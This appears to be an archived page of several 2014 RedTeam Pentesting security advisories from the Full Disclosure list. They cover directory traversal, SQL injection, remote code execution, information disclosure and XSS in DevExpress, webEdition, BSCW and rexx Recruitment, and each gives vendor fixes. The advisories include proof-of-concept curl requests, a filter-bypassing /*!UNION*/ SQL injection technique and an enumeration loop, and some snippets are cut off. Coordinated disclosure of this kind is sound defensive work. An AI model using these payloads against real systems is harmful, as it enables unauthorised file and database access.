RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks or products are uncovered and can be
fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de

[FD] [RT-SA-2014-006] Directory Traversal in DevExpress ASP.NET File Manager

2014-06-05 Thread RedTeam Pentesting GmbH
Advisory: Directory Traversal in DevExpress ASP.NET File Manager

During a penetration test RedTeam Pentesting discovered a directory
traversal vulnerability in DevExpress' ASP.NET File Manager and File
Upload. Attackers are able to read arbitrary files by specifying a
relative path.


Product: DevExpress ASPxFileManager Control for WebForms and MVC
Affected Versions: DevExpress ASPxFileManager v10.2 to v13.2.8
Fixed Versions: DevExpress ASPxFileManager v13.2.9
Vulnerability Type: Directory Traversal
Security Risk: high
Vendor URL:
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-006
Advisory Status: published
CVE: CVE-2014-2575
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2575


"The DevExpress ASP.NET Subscription includes a standalone Multi-File
Upload Manager for WebForms and MVC and a pre-built File Manager for
WebForms; built so you can instantly introduce file management
capabilities in your next web application."

(from DevExpress' Homepage)

More Details

The ASPX File Manager component is prone to a directory traversal
vulnerability. Attackers with access to the File Manager component can
read arbitrary files on the same partition as the shared directory.

A common request to download a file via the File Manager component
requires multiple HTTP-Post parameters:


The parameter __EVENTARGUMENT=13| specifies a file download
and the file which is to be downloaded. Attackers may also request files
outside of the shared directory by prepending a relative path to a
parent directory.

Proof of Concept

By requesting files with a relative path, files otherwise not available
will be accessible through the File Manager component.  Depending on the
shared directory and the webserver configuration, the webserver
configuration file might for example be accessible through the File
Manager component:


Other sensitive operating system files could be affected, too.

Example exploit:

curl --data __EVENTTARGET=ctl00%24ContentPlaceHolder1%24ASPxFileManager1\
"&__EVENTARGUMENT=13%7C../../web.config&=&__EVENTVALID" \

The request above will download the specified file.


Instead of a physical file system provider, a database file system
provider with limited access permissions could be used.


Update ASPxFileManager control to DevExpress libraries version v13.2.9.

Security Risk

The risk is estimated to be high. This vulnerability allows attackers to
access arbitrary files on the same partition as the File Manager's root
directory. This may allow attackers to read sensitive information like
the webserver configuration.


2014-03-10 Vulnerability identified
2014-03-21 Customer approved disclosure to vendor
2014-03-21 CVE number requested and assigned
2014-03-25 Vendor notified
2014-04-11 Customer opened support ticket with vendor
2014-04-17 Vendor released fixed version
2014-04-17 Vendor released security advisory to customers
2014-06-05 Advisory released


Vendor Security Advisory:

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks or products are uncovered and can be
fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen

Description: Digital signature

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2014-005] SQL Injection in webEdition CMS File Browser Installer Script

2014-05-28 Thread RedTeam Pentesting GmbH
Advisory: SQL Injection in webEdition CMS File Browser

RedTeam Pentesting discovered an SQL injection vulnerability in the file
browser component of webEdition CMS during a penetration test.
Unauthenticated attackers can get read-only access on the SQL database
used by webEdition and read for example password hashes used by
administrative accounts.


Product: webEdition CMS
Affected Versions: webEdition svn6985 down to,
   probably earlier versions, too
Fixed Versions: 6.2.7-s1 - 6.3.8-s1
Vulnerability Type: SQL Injection
Security Risk: high
Vendor URL: http://www.webedition.org
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-005
Advisory Status: published
CVE: CVE-2014-2303
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2303


"webEdition is a flexible CMS for companies of every size. It offers a
great amount of functionality and can be flexibly customized for
individual needs. It is ideally suited for users who want to operate
their web-site comfortably. Even the creation of custom web-applications
is easily possible with webEdition."

(translated from webEdition homepage)

More Details

The webEdition CMS contains a file browser component that allows
browsing parts of the website's filesystem structure. It is usually
reachable under the following URL:


When browsing to individual directories, HTTP GET requests such as the
following are sent to the web server:

GET /webEdition/we_fs.php?what=4&table=tblFile&id=1&order=IsFolder%20
DESC,%20Text&filter= HTTP/1.1
Host: www.example.com

The server responds with JavaScript code that updates the directory


The requests which are sent to retrieve this information contain two
interesting parameters: "table" with a value of "tblFile" which appears
to name a database table, and the parameter "order" with a value of
"IsFolder DESC, Text", which contains parts of an SQL ORDER BY clause.
In combination, these two parameters can be used to perform SQL
injection attacks. It appears that they are embedded into an SQL query
in a similar manner as follows:

SELECT ID,ParentID,Text,Path,IsFolder,Icon
   FROM tblFile
  WHERE [...]
   ORDER BY IsFolder DESC, Text

Using a "table" parameter value of "tblFile WHERE 1=1 /*" and an "order"
parameter value of "*/", will result in a query similar to the

SELECT ID,ParentID,Text,Path,IsFolder,Icon
   FROM tblFile WHERE 1=1 /*
  WHERE [...]
   ORDER BY */

The queries executed by the CMS retrieve six columns, which can be seen
in the application's source code, or by injecting ORDER BY clauses with
numeric column indexes into the query. Knowing the number of columns in
a query, it is typically possible to use the UNION operator to obtain
additional information, for example from other tables. As a security
measure, webEdition implements filtering of the UNION keyword.

The web application checks whether the text "UNION" is part of
user-supplied information that is entered into database queries and then
blocks such queries. This behaviour is implemented in the file

using the function
preg_match('/[\s\(`"\'\\/)]union[\s\(`\/]/i', $queryWithoutStrings)

The CMS first checks whether the text "UNION" appears in the query
string in any combination of upper- and lowercase characters. If that is
the case, a regular expression is used to determine whether the word
"UNION" appears in any context that is deemed dangerous by the
application developers. However, the underlying MySQL database system
supports embedding MySQL-specific query code within comments that
contain an exclamation mark ("!")
(see https://dev.mysql.com/doc/refman/5.5/en/comments.html).

For example, a query like

SELECT * FROM tblUsers WHERE 1=0 /*! OR 1=1 */

will yield no results on other database systems, but will return all
rows on MySQL. Likewise, the text "/*!UNION*/", which is not caught by
the aforementioned regular expression, can be used instead of just
"UNION" on MySQL, thus enabling injections that use the UNION operator:

$ curl --silent 'http://www.example.com/webEdition/we_fs.php?what=4'\

[FD] [RT-SA-2014-004] Remote Command Execution in webEdition CMS Installer Script

2014-05-28 Thread RedTeam Pentesting GmbH
r releases between 6.2.7 and 6.3.8. The newest, updated
version would therefore be 6.3.8-s1.

Note that the version check of webEdition might tell you that there is
no update available and that you are running Version "6.3.8 (
Release, SVN-Revision 6985). It will still tell you that the newest
available version is "6.3.8-s1 ( Release, SVN-Revision 6985)", so
you can use the "Update-Repetition" function to get the fix for this

Also note that the update does not remove the OnlineInstaller, but
modifies the login dialogue to remove the OnlineInstaller instead. You
will need to open the login dialogue after installing the update to
actually delete the OnlineInstaller. To be on the safe side, check the
OnlineInstaller directory manually for any files that still need to be

Security Risk

Attackers can not only use the OnlineInstaller to destructively
reinstall webEdition, but can also run arbitrary code PHP code by
setting their own proxy server in the OnlineInstaller and inject content
that is used as a parameter for the PHP eval() function. Since this
attacker-supplied code is executed on the webEdition server with the
privileges of the web server, this is a high risk, especially because
the attack is not as easy to detect as a reinstallation of webEdition by
an attacker.


2014-02-20 Vulnerability identified
2014-03-04 Customer approved disclosure to vendor
2014-03-06 CVE number requested and assigned
2014-03-07 Vendor notified
2014-03-10 Vendor acknowledges vulnerability
2014-05-20 Vendor announces fixed versions
2014-05-28 Advisory released


Wichtige-Hinweise-zum-Sicherheitsupdate (German)

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks or products are uncovered and can be
fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen

Description: Digital signature

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2014-003] Metadata Information Disclosure in OrbiTeam BSCW

2014-05-08 Thread RedTeam Pentesting GmbH
Advisory: Metadata Information Disclosure in OrbiTeam BSCW

RedTeam Pentesting discovered an information disclosure vulnerability in
OrbiTeam's BSCW collaboration software. An unauthenticated attacker can
disclose metadata about internal objects which are stored in BSCW.


Product: BSCW
Affected Versions: BSCW <=5.0.7
Fixed Versions: BSCW >=5.0.8
Vulnerability Type: Information Disclosure
Security Risk: medium
Vendor URL: http://www.bscw.de/english/product.html
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-003
Advisory Status: published
CVE: CVE-2014-2301
CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2301


"The BSCW shared workspace system is the tool of choice for efficient
group collaboration. BSCW permits the creation of documents,
appointments, contacts, tasks and notes within shared workspaces.
Without having to install additional software, team members can access
this data around-the-clock, from anywhere in the world. Mission-critical
information is constantly available to all authorised personnel
regardless of location, ensuring that complex workflows can be
coordinated with minimal effort."

(from OrbiTeam's homepage)

More Details

BSCW uses the URL parameter "op" to select different functions of the
application. For example the password reset dialog can be used by
opening the following URL:


The server maps the value provided by the parameter "op" to locally
stored python modules which provide handler functions that are called to
generate HTTP responses. It was discovered that sensitive metadata about
internally stored objects of BSCW can be disclosed by using the "inf"

When opening the following URL, the filename of a document which
is identified by the value "12345" is disclosed in the response
sent by the server (output shortened):

$ curl --header 'Cookie: _pub_bscws="e4efb9e7ace7a12de82aa7a4aff1ab2a:1"' \



The cookie used in the above command is generated by requesting the
login page of BSCW. It is not necessary to enter credentials.

By iterating over the ids which are assigned in ascending order,
attackers can enumerate the names of all objects stored in BSCW without
prior authentication. This includes filenames and email addresses.

Proof of Concept

When the following loop is run with a valid (but unauthenticated) BSCW
cookie, it will find names for the BSCW objects 1 to 3:

$ for id in `seq 1 3`; do
 filename = `curl --silent --header 'Cookie: 
_pub_bscws="COOKIE_COOKIE_COOKIE"' \
"http://www.example.com/pub/bscw.cgi/${id}?op=inf"; | \
grep "iValueB" | \
sed -e 's;^.*\(.*\).*$;\1;'`
 echo "${id}: ${filename}"


It may be possible to add another authentication layer, for example
HTTP-Authentication, to limit access to this BSCW information disclosure
to persons authorized to use BSCW anyway.


Update to version 5.0.8.

Security Risk

The risk is estimated to be medium. This vulnerability does not allow
attackers to access files stored in BSCW. They can however retrieve
filenames, which may be enough to draw conclusions about the
corresponding file contents, and other potentially sensitive data such
as email addresses.


2014-02-20 Vulnerability identified
2014-03-04 Customer approved disclosure to vendor
2014-03-06 CVE number requested and assigned
2014-03-07 Vendor notified
2014-03-10 Vendor acknowledges vulnerability
2014-04-22 Vendor released fixed version
2014-05-08 Advisory released

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks or products are uncovered and can be
fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen

Description: Digital signature

[FD] [RT-SA-2014-002] rexx Recruitment: Cross-Site Scripting in User Registration

2014-03-27 Thread RedTeam Pentesting GmbH
Advisory: rexx Recruitment Cross-Site Scripting in User Registration

RedTeam Pentesting discovered a cross-site scripting (XSS) vulnerability
in rexx Recruitment's user registration page during a penetration test.
If attackers can persuade users to click on a prepared link or
redirected them to such a link from an attacker-controlled website, they
are able to run arbitrary JavaScript code in the context of the rexx
Recruitment installation's domain.


Product: rexx Recruitment
Affected Versions: Releases prior to those fixed on 2014-01-15
Fixed Versions: R6.1 and R7 with fixes from 2014-01-15
Vulnerability Type: Cross-Site Scripting
Security Risk: high
Vendor URL: http://www.rexx-systems.com
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-002
Advisory Status: published
CVE: CVE-2014-1224
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1224


"rexx Recruitment supports around 3 million application processes each
year (data from 2011). This stems from experience in applicant
management: from company recruitment in small and medium-sized
enterprises and international companies, through to specialised
personnel service providers.

The rexx Recruitment software supports paper, online and email
applications. All information about and communication with the applicant
at a glance in the digital applicant file!"

(from rexx systems' homepage)

More Details

The rexx Recruitment software includes a user registration where job
applicants who want to stay informed about new vacancies can register.
The registration site is usually available at the path "/reg", for
example at a URL like the following:


The website asks for some mandatory data like name and surname as well
as postal and email addresses. If a mandatory entry is missing when
submitting the data, the website will present the registration site
again to the user, with those input fields pre-populated with the data
that was already filled in and error messages for the missing input
fields. The pre-populated "first name" field with the name "redteam"
would for example look as follows in the HTML source code:

If it is now tried to embed control characters like an opening angle
bracket in the name, the system filters the input by removing everything
after the bracket.  The value "red

Proof of Concept

The following URL adds a new "onfocus" event handler to the "fname"
input field that gets executed as soon as the website is loaded due to
the "autofocus" attribute:



If possible, disable user registration and disallow access to the
registration website, e.g. by blocking access in the web server.


Update to versions R6.1 or R7 with the fixes from 2014-01-15 included.

Security Risk

The risk of this vulnerability is estimated to be high. Being able to
embed arbitrary JavaScript code allows attackers to completely
manipulate the website, add their own content and track all user


2013-12-04 Vulnerability identified
2013-12-10 Customer approved disclosure to vendor
2013-12-13 Vendor notified
2014-01-15 Vendor released fixed version
2014-02-11 CVE number requested and assigned
2014-03-27 Advisory released

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks or products are uncovered and can be
fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen

Description: Digital signature

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/